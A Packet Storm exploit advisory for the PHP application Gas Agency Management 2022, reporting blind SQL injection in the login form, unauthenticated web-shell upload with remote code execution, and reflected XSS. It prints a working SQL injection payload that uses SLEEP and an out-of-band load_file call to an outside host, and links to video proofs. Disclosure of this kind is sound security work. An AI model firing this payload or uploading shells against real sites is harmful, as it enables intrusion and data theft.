what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Gas Agency Management 2022 SQL Injection / XSS / Shell Upload

Gas Agency Management 2022 SQL Injection / XSS / Shell Upload
Posted Aug 12, 2022
Authored by nu11secur1ty

Gas Agency Management 2022 suffers from cross site scripting, remote SQL injection, and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, sql injection
SHA-256 | fbd80e45f29f9c744b81fc81cb49905ea0ee4dbf9f49738b949c8e75caba6e49

Gas Agency Management 2022 SQL Injection / XSS / Shell Upload

Change Mirror Download
## Title: Gas Agency Management-2022 by Mayuri K - SQLi+FU-RCE+XSS
## Author: nu11secur1ty
## Date: 08.12.2022
## Vendor Homepage: https://www.mayurik.com/#download_section
## Software Link-0:
https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html
## Software Link-1:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022/Docs/gasmark.zip


## Description:
The Gas Agency Management-2022 by Mayuri K suffers from multiple
vulnerabilities, which means this project must be deprecated
immediately!

1. - SQLi: the parameter username is vulnerable to time-based blind
(query SLEEP) injection - not sanitizing well.
2. - Unauthenticated file upload - not sanitizing upload function -
possible to upload .php extension files on photo section, for the
customers.
3. - XSS-reflected in the section adds customer in address function.
4. - Web shell file upload - unauthenticated extension file upload, in
this case, is PHP web shell uploader. After this, the malicious user
can execute the already uploaded file remotely, and he can destroy
completely this flawed system.
5. - STATUS: For termination of the project.

[+]Payloads:

```mysql
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=mxiusQzi'+(select
load_file('\\\\alzg6yrkl2xieezgaz9zqnya91fu3lw9ncb4yumj.tupaciganka.com\\jfe'))+''
AND (SELECT 9964 FROM (SELECT(SLEEP(5)))bVfa)--
FygL&password=r8H!r2a!U2&login=
---
```
[+]Unauthenticated Upload:
- - - in the video:https://streamable.com/opqz3n

[+]XSS-Reflected:
- - - in the video:https://streamable.com/opqz3n

[+]RCE:
- - - in the video:https://streamable.com/opqz3n

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)

## Proof and Exploit:
[href](https://streamable.com/opqz3n)


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close